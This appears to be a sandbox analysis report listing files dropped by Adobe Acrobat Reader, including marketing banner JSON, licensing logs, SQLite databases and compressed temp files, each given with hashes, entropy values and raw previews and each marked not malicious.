C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.271856913671367
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJfbPtdPeUkwRe9:YvXKXQR+x4yYpW7ndiVGDV8Ukee9
MD5:	2D9B1584630B12D014134BE08B156892
SHA1:	4863498B2C7E04768CA01660A5C75CEE058BB98E
SHA-256:	1635586A610E4A2085F1F65E03CA2E96446DEAF1D188EFFA9AF8F5C655A41AD0
SHA-512:	29B4FEAD2A33726275915E6D9940CC2C2558DB8D0094C77331DAD2DB36ABD5ECEC0E0C8E2804FE0F7C28AA9B9ECFA6304F63F54E158EE4CA536EE65D4F969F99
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	287
Entropy (8bit):	5.273052822949866
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJf21rPeUkwRe9:YvXKXQR+x4yYpW7ndiVG+16Ukee9
MD5:	0CD0CCDEA9361D954446B55B7FBE0221
SHA1:	A834891F4616040E88C5DF6D35906B830D82C669
SHA-256:	B21040A43029C805D63D5CD5C511D2D4AA06EFAC62326258670E3B14B12C4FA5
SHA-512:	EAC37CF2F9BD40F713E8DDB0D6CC0E43F51273972F1CA4BCBBDCACF5088ACC52BE3776BC599AA6F1FF17592164D0686D30B41F6E97B89EBFC96B704A12EB3D3D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.667465425025824
Encrypted:	false
SSDEEP:	24:Yv6XQR+uXi9amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSx:Yv8uyRBgkDMUJUAh8cvMx
MD5:	F42125DA45D1A91AF8EEAB650485514F
SHA1:	725CD1CFECABC38632398A23698A31E776B73057
SHA-256:	9D3252E1A8241578ACAA87FE720ACB9C8EA8D76B9756095EB133EA749849D3A5
SHA-512:	08AE1E3710BC52D970DE56E53B1FF57AC2F2AE5A8276E328EA014EC525624DBFFF189710D2786FA686B138DDF2794BA9AC31F16DA656799D2E5FA5946ED6BE64
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	5.248659791603726
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJfshHHrPeUkwRe9:YvXKXQR+x4yYpW7ndiVGUUUkee9
MD5:	BE6193A4503343A898B1EF620D365ABE
SHA1:	11C8C83D62B036CCF722A2C8BB3C814B30D1F144
SHA-256:	343A8AAE6FDDBD3D9D830F679FE80E5D8CCC9E7E8F9F3442AD5C01737E20EBB4
SHA-512:	D46E80C5FD1FE725BC9562B03D9FCD5D585836AB9BB4F7878EC30BF5EB3FAAB847438A0B3786E701B19AA880519EBCDC968A50FB99FC31283891122AECEA88A4
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.25750700698667
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJTqgFCrPeUkwRe9:YvXKXQR+x4yYpW7ndiVGTq16Ukee9
MD5:	377C51441491EB9EACB79C1694A44928
SHA1:	B206F8A8F7F8EAB61C5A1D1524E993DBE5ACC092
SHA-256:	C7342A51BC5025D63B55D0682D24BAD32AF79A270D1649CD558FBA2511F91A42
SHA-512:	95D0D4B3D603DBE1ACD39D02D55837313D8AECC23BFB5A31ED734CDE5E7F22826D365E7588C1FAB4EDD45F3E825B96476DBF039DE7E27A7C215D9849A3FD500D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2814
Entropy (8bit):	5.139888684417487
Encrypted:	false
SSDEEP:	24:YXHr0aryayMGYJ6mzbqdR2XvEj6uwj0SoH6Cw28WzF2LSyCH0HTmAbRL5u93fudY:YXb5vzuT2uoc6bcolTmAblE938Y
MD5:	AA7D0BAC783375B806561B26D1D7B1EA
SHA1:	0758DD1069AF014780CE216BA1A3A0BCFC903616
SHA-256:	63426AF93F31C03BD5D89FD7C027E593281F8B01EAA02E9D15B1D2628FCDF630
SHA-512:	DD54DBBBF3198AD88DC398DAA0A5C77BC4BE2964DAD5E80C004821F5057D45F2824D0D37D2323D82C7BA6AD8659B756054353A6B5D8A0910C544F8AD3B26C3FC
Malicious:	false
Preview:	{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"572f278dbb89e7224fe650be8c23d0b4","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734714673000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"3749a640af34009a70ccdad9b793bb67","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734714673000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"d76b1d32a3a0b0ddc457c85a662b3ed7","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734714673000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"3b7c33b3da39eb2161b597a66abc4316","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734714673000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"7d3489d379ec2fb3b8f8686e41fa83d1","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734714673000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"87b997aec8ee94bd51ff129493ecea8c","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	0.9859343785576578
Encrypted:	false
SSDEEP:	24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SppU4zJwtNBwtNbRZ6bRZ4MUF:TVl2GL7ms6ggOVp9zutYtp6Pg
MD5:	03041EA9642A76AE11BE023A0776F95E
SHA1:	EFE8A4BC638B061DF5204A8B3489A81D4FFD45DA
SHA-256:	4F3A3B342BBA1DE3499807033E8C93F166DC43B552A0552BC15E342C246F568D
SHA-512:	CB2A42486418D336891438C01667564C10EFDF6DCD5A40CB9387BFCF01AC55C5FBBB2F4B7933CE0623E14E60827608D1C86F6574387F7FEC1F01910168415FA5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.338751607435319
Encrypted:	false
SSDEEP:	24:7+t4AD1RZKHs/Ds/SppUPzJwtNBwtNbRZ6bRZWf1RZKeqLBx/XYKQvGJF7ursan:7M4GgOVpmzutYtp6PMzqll2GL7msa
MD5:	F6FB4ABD6222A68CA943CFB6C24390B0
SHA1:	881D35FAE203297B09BC70CA9C64557708998835
SHA-256:	53DB1784F0225FE289D1B8D2C4D310B2BB28879E9F62685A1A41A485A28CCD5E
SHA-512:	C004DF2160861E88EDCC0BBF6DA9A42545A8D15F43963376D82053996C356C1D7304F7656327C7A47B9AA04C9E99053CA25F36BE1153E14CBE34655D4F65494E
Malicious:	false
Preview:	.... .c.......0.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEgeToTfS1rFN3uK6V4y+uB/lYyu:6a6TZ44ADEeTIa1BN+KMlK
MD5:	61B1F2AE5C03780D63B72BFA5812D130
SHA1:	C90BF563C31E8152D772439C9A3D15FE23A70DC4
SHA-256:	41DBDAF0C006A63A52FBBA797F69FFC0B6D4545693318F09DF7CD22836CBCBC0
SHA-512:	BE3FC484A5F258EA0B9034AE0D251476C7FDF9100275AFBEBB8AEB1DC24048183B377089091B8753678F046965E755C2226C5EC4D0129C15A1E54CD107BCC203
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Temp\MSIb8022.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.4628324502629617
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8QO6a3GleH:Qw946cPbiOxDlbYnuRKZO/GlU
MD5:	3B15F8999E75C6C53B05CA32C72DBE95
SHA1:	233BB3B7BDCEC70B2DFA9C08338B505F11F25190
SHA-256:	3E04917059A09681E315AB7BBA9B047C004ECCD491ACFA5522CAFC491C0EBD09
SHA-512:	206D40EC2F1E7BFB628F6AEBE412A15E58D73C1A46E75F55C85B66A9A5A64FC665BA18C847AE12EF12A07E40D60BE4404B9A5AEEE90544C2E3747072D36B01C9
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.0./.1.2./.2.0.2.4. . .1.2.:.1.1.:.1.1. .=.=.=.....

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-20 12-11-06-566.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.376360055978702
Encrypted:	false
SSDEEP:	384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
MD5:	1336667A75083BF81E2632FABAA88B67
SHA1:	46E40800B27D95DAED0DBB830E0D0BA85C031D40
SHA-256:	F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
SHA-512:	D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
Malicious:	false
Preview:	SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.35298750545
Encrypted:	false
SSDEEP:	384:2cLV8VjV/VIVeMV8VZVbdV5VFVpVCVBldX9uTT8P2OldGngpNXP/7bmJiA5XIA3+:TiNdGoMajVd/PLwF
MD5:	4B6164B0D048A3E0460A947C180B375C
SHA1:	4DE57E7C05D7F672C5A706963054BA4BEBA336A2
SHA-256:	487B3E1AB5B5BC38B3814C7CF7F49753CF37DE8F6C4C672C5A6B4EE8A1D31A89
SHA-512:	0556826587FF17A163FCE357123EE06663EA7C85C4D268C124D53B49BF20727A24EB2E528D77CF5EBB218FA9C875377DF7A22AFB47B190B5E939F3057E070327
Malicious:	false
Preview:	SessionID=b1cb1927-d281-4f76-a9e5-f082faaf7de8.1734714666581 Timestamp=2024-12-20T12:11:06:581-0500 ThreadID=7440 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=b1cb1927-d281-4f76-a9e5-f082faaf7de8.1734714666581 Timestamp=2024-12-20T12:11:06:598-0500 ThreadID=7440 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=b1cb1927-d281-4f76-a9e5-f082faaf7de8.1734714666581 Timestamp=2024-12-20T12:11:06:599-0500 ThreadID=7440 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=b1cb1927-d281-4f76-a9e5-f082faaf7de8.1734714666581 Timestamp=2024-12-20T12:11:06:599-0500 ThreadID=7440 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=b1cb1927-d281-4f76-a9e5-f082faaf7de8.1734714666581 Timestamp=2024-12-20T12:11:06:599-0500 ThreadID=7440 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.393975372632221
Encrypted:	false
SSDEEP:	768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbh:t
MD5:	DAF8E3EC1C6973A79F527D226806C485
SHA1:	08E1DECA66A09D30B97B2DEFF70E56D1DFB187BC
SHA-256:	D6D637E76921597C9ACEFABCD96A355FCE5DBC78339527E1942A3C750900ABCE
SHA-512:	1301CBE78ACD370AFE5BF31519DE18D987D2FA6A7720F0D9F13CE1D19A2A6FEA45461AEEFA349652DD439FB169B2D67CFF1F3D9AF9E8DA8F2C4862E7C99B6DDB
Malicious:	false
Preview:	04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : *************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***********************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\1b4cd52c-16a1-4574-8198-ab715981ba39.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje
MD5:	716C2C392DCD15C95BBD760EEBABFCD0
SHA1:	4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
SHA-256:	DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
SHA-512:	E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\59146b90-de21-4e24-81f1-52ce56fe484e.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\a403dc07-5a5f-41e2-822b-7367ad3422e5.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
MD5:	18E3D04537AF72FDBEB3760B2D10C80E
SHA1:	B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
SHA-256:	BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
SHA-512:	2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\ecca95a4-6f16-4963-8f79-76d3767d620d.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
